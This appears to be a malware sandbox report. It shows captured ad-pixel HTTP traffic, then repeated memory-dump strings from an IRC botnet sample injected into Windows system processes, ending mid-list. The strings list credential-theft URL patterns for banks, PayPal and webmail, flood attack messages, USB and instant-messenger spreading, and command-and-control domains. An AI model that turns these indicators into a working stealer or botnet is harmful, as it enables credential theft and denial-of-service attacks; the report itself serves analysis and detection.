GET /pixel.gif?id=5397210&r=0.8022853591730279&u=http://esmusicon.com/Poemas/ HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: px.pub-fit.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT

ETag: 325472601571f31e1bf00674c368d335

Content-Length: 43

Accept-Ranges: bytes

X-Timestamp: 1363188507.50732

Content-Type: image/gif

X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1

Cache-Control: public, max-age=819

Expires: Mon, 21 Apr 2014 12:11:08 GMT

Date: Mon, 21 Apr 2014 11:57:29 GMT

Connection: keep-alive

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT..ETag: 325472601571f31e1bf00674c368d335..Content-Length: 43..Accept-Ranges: bytes..X-Timestamp: 1363188507.50732..Content-Type: image/gif..X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1..Cache-Control: public, max-age=819..Expires: Mon, 21 Apr 2014 12:11:08 GMT..Date: Mon, 21 Apr 2014 11:57:29 GMT..Connection: keep-alive..GIF89a.............!.......,...........D..;....

GET /pixel.gif?id=5397210&r=0.8917821187154981&u=http://esmusicon.com/ HTTP/1.1

Accept: */*

Referer: hXXp://u.pub-fit.com/2454.html?s=300x250

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: px.pub-fit.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT

ETag: 325472601571f31e1bf00674c368d335

Content-Length: 43

Accept-Ranges: bytes

X-Timestamp: 1363188507.50732

Content-Type: image/gif

X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1

Cache-Control: public, max-age=805

Expires: Mon, 21 Apr 2014 12:11:08 GMT

Date: Mon, 21 Apr 2014 11:57:43 GMT

Connection: keep-alive

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Last-Modified: Wed, 13 Mar 2013 15:28:28 GMT..ETag: 325472601571f31e1bf00674c368d335..Content-Length: 43..Accept-Ranges: bytes..X-Timestamp: 1363188507.50732..Content-Type: image/gif..X-Trans-Id: tx5f5099010b8047368de41-005318f44cdfw1..Cache-Control: public, max-age=805..Expires: Mon, 21 Apr 2014 12:11:08 GMT..Date: Mon, 21 Apr 2014 11:57:43 GMT..Connection: keep-alive..GIF89a.............!.......,...........D..;..

Map

Strings from Dumps

2.exe_1240:

.text

`.data

.rsrc

MSVBVM60.DLL

333333333333330

f00.PR

3333333330

3333330

WebBrowser

SHDocVwCtl.WebBrowser

ieframe.dll

2C:\Windows\SysWOW64\ieframe.oca

%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB

MsgWaitForMultipleObjects

VBA6.DLL

http:///

@*\AC:\Users\usuario\Desktop\a\nuevato\autoClick.vbp

http://mi.2papa.us

Cargando web:

Web cargada

http://tutecnologia.info/ads.php

mi.2papa.exe

2.exe_1240_rwx_00150000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

c:\%original file name%.exe

\\.\pipe\e621ca05

%Documents and Settings%\%current user%\Application Data\2.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\Documents and Settings\"%CurrentUserName%"\Application Data\2.exe

2.exe_1240_rwx_00400000_00019000:

.text

`.data

.rsrc

MSVBVM60.DLL

333333333333330

f00.PR

3333333330

3333330

WebBrowser

SHDocVwCtl.WebBrowser

ieframe.dll

2C:\Windows\SysWOW64\ieframe.oca

%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB

MsgWaitForMultipleObjects

VBA6.DLL

http:///

@*\AC:\Users\usuario\Desktop\a\nuevato\autoClick.vbp

http://mi.2papa.us

Cargando web:

Web cargada

http://tutecnologia.info/ads.php

mi.2papa.exe

csrss.exe_688_rwx_02C60000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

\??\%System%\csrss.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\csrss.exe

c:\%original file name%.exe

winlogon.exe_712_rwx_015F0000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0`

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

%s:%d

%s.%s%s

%S%s%s

%s.%S%S

%S%S%S

state_%s

%s.%s (p='%S')

pop3://%s:%s@%s:%d

%s:%s@%s:%d

ftp://%s:%s@%s:%d

ftpgrab

%s.%s ->> %s (%s : %s)

%s.%s ->> %s : %s

%s-%s-%s

%s.Blocked possible browser exploit pack call on URL '%s'

%s.Blocked possible browser exploit pack call on URL '%S'

webroot.

virusbuster.nprotect.

heck.tc

onecare.live.

login[password]

login[username]

*members*.iknowthatgirl*/members*

*youporn.*/login*

*members.brazzers.com*

*bcointernacional*login*

*:2222/CMD_LOGIN*

*whcms*dologin*

*:2086/login*

*:2083/login*

*:2082/login*

*webnames.ru/*user_login*

Webnames

*dotster.com/*login*

loginid

*enom.com/login*

login.Pass

login.User

*login.Pass=*

*1and1.com/xml/config*

*moniker.com/*Login*

LoginPassword

LoginUserName

*LoginPassword=*

*namecheap.com/*login*

loginname

*godaddy.com/login*

Password

*Password=*

*alertpay.com/login*

*netflix.com/*ogin*

*thepiratebay.org/login*

*torrentleech.org/*login*

*vip-file.com/*/signin-do*

*sms4file.com/*/signin-do*

*letitbit.net*

*what.cd/login*

*oron.com/login*

*filesonic.com/*login*

*speedyshare.com/login*

*uploaded.to/*login*

*uploading.com/*login*

loginUserPassword

loginUserName

*loginUserPassword=*

*fileserv.com/login*

*hotfile.com/login*

*4shared.com/login*

txtpass

*txtpass=*

*netload.in/index*

*freakshare.com/login*

login_pass

*login_pass=*

*mediafire.com/*login*

*sendspace.com/login*

*megaupload.*/*login*

*depositfiles.*/*/login*

*signin.ebay*SignIn

*officebanking.cl/*login.asp*

*secure.logmein.*/*logincheck*

session[password]

*password]=*

*twitter.com/sessions

txtPassword

*&txtPassword=*

*.moneybookers.*/*login.pl

*runescape*/*weblogin*

*&password=*

*no-ip*/login*

*steampowered*/login*

quick_password

*hackforums.*/member.php

*facebook.*/login.php*

*login.yahoo.*/*login*

passwd

login

*passwd=*

*login.live.*/*post.srf*

TextfieldPassword

*TextfieldPassword=*

*gmx.*/*FormLogin*

*Passwd=*

FLN-Password

*FLN-Password=*

*pass=*

*bigstring.*/*index.php*

*screenname.aol.*/login.psp*

password

loginId

*password=*

*aol.*/*login.psp*

Passwd

*google.*/*ServiceLoginAuth*

login_password

login_email

*login_password=*

*paypal.*/webscr?cmd=_login-submit*

%s / ?%d HTTP/1.1

Host: %s

User-Agent: %s

Mozilla/4.0

\\.\PHYSICALDRIVE0

shell32.dll

httpi

dnsapi.dll

http://%s/%s

http://%s/

POST /23s

{%s|%s%s}%s

n%s{%s|%s%s}%s

%s|%s|%s

[DNS]: Redirecting "%s" to "%s"

%s|%s

[Logins]: Cleared %d logins

FTP ->

[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)

http://

[Login]: %s

[DNS]: Blocked %d domain(s) - Redirected %d domain(s)

[Speed]: Estimated upload speed %d KB/s

Software\Microsoft\Windows\CurrentVersion\Run

icon=shell32.dll,7

shellexecute=

%windir%\system32\cmd.exe

&&%%windir%%\explorer.exe %Í%%%s

/c "start %Í%%RECYCLER\%s

\\.\%c:

%s\%s

%sautorun.tmp

%sautorun.inf

%0x.exe

*bebo.*/c/profile/comment_post.json

*bebo.*/mail/MailCompose.jsp*

*friendster.*/sendmessage.php*

*friendster.*/rpc.php

*vkontakte.ru/mail.php

*vkontakte.ru/wall.php

*vkontakte.ru/api.php

*facebook.*/ajax/*MessageComposerEndpoint.php*

msg_text

*facebook.*/ajax/chat/send.php*

-_.!~*'()

%s.%s hijacked!

MSG %d %s %d

MSG %d %1s

SDG %d %d

Content-Length: %d

SDG %d

%s_0xX

RegCreateKeyExW

RegCreateKeyExA

URLDownloadToFileW

URLDownloadToFileA

HttpSendRequestW

HttpSendRequestA

NtEnumerateValueKey

DNSAPI.dll

Secur32.dll

ShellExecuteA

SHELL32.dll

HttpQueryInfoA

InternetOpenUrlA

HttpQueryInfoW

WININET.dll

SHLWAPI.dll

WS2_32.dll

MSVCRT.dll

GetProcessHeap

ConnectNamedPipe

CreateNamedPipeA

DisconnectNamedPipe

GetWindowsDirectoryW

GetWindowsDirectoryA

KERNEL32.dll

USER32.dll

RegCloseKey

RegNotifyChangeKeyValue

RegOpenKeyExA

ADVAPI32.dll

ole32.dll

mom002.net

mom003.net

mom004.net

]1.1.0.0

msn.set

msn.int

http.set

http.int

http.inj

logins

PASS %s

[.ShellClassInfo]

CLSID={645FF040-5081-101B-9F08-00AA002F954E}

USER %s 0 0 :%s

NICK %s

JOIN %s %s

PART %s

PRIVMSG %s :%s

QUIT :%s

PONG %s

[v="%s" c="%s" h="%s" p="%S"]

[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d

[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d

[Slowloris]: Starting flood on "%s" for %d minute(s)

[Slowloris]: Finished flood on "%s"

[UDP]: Starting flood on "%s:%d" for %d second(s)

[UDP]: Finished flood on "%s:%d"

[SYN]: Starting flood on "%s:%d" for %d second(s)

[SYN]: Finished flood on "%s:%d"

[USB]: Infected %s

[MSN]: Updated MSN spread message to "%s"

[MSN]: Updated MSN spread interval to "%s"

[HTTP]: Updated HTTP spread message to "%s"

[HTTP]: Injected value is now %s.

[HTTP]: Updated HTTP spread interval to "%s"

[Visit]: Visited "%s"

[DNS]: Blocked "%s"

[usb="%d" msn="%d" http="%d" total="%d"]

[ftp="%d" pop="%d" http="%d" total="%d"]

[RSOCK4]: Started rsock4 on "%s:%d"

[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)

[d="%s"] Error downloading file [e="%d"]

[d="%s"] Error writing download to "%S" [e="%d"]

[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]

[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]

[d="%s"] Error getting temporary filename. [e="%d"]

[d='%s"] Error getting application data path [e="%d"]

[Visit]: Error visitng "%s"

[FTP Login]: %s

[POP3 Login]: %s

[FTP Infect]: %s was iframed

[HTTP Login]: %s

[HTTP Traffic]: %s

[Ruskill]: Detected File: "%s"

[Ruskill]: Detected DNS: "%s"

[Ruskill]: Detected Reg: "%s"

[PDef ]: %s

[DNS]: Blocked DNS "%s"

[MSN]: %s

[HTTP]: %s

ftplog

ftpinfect

httplogin

httptraff

httpspread

http://api.wipmania.com/

\\.\pipe\x_ipc

\\.\pipe\e621ca05

\??\%System%\winlogon.exe

%WinDir%

%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\winlogon.exe

c:\%original file name%.exe

services.exe_756_rwx_00B60000_0004E000:

.text

`.rdata

@.data

.reloc

=MSG t

>MSG u`

=PASS

8httpu1

8httpuM

tlSSSSSSSSSShL0

%s.%s

%s.%S

%s.Blocked "%s" from removing our bot file!

%s.Blocked "%S" from removing our bot file!

i.root-servers.org

%s.Blocked "%s" from moving our bot file

%s.Blocked "%S" from moving our bot file

%s.p10-> Message hijacked!

%s.p10-> Message to %s hijacked!

%s.p21-> Message hijacked!

msnmsg

CAL %d %6s

ngr->blocksize: %d

block_size: %d

\\.\pipe\%s

kernel32.dll

%s_%d

%s-Mutex

ntdll.dll

%s-pid

%s-comm

JOIN #

PRIVMSG #

%s.Blocked "%S" from creating "%S"

%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!

%s.Detected process "%S" sending an IRC packet to server %s:%d.

%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).

PRIVMSG %5s

JOIN %5s

PRIVMSG

JOIN

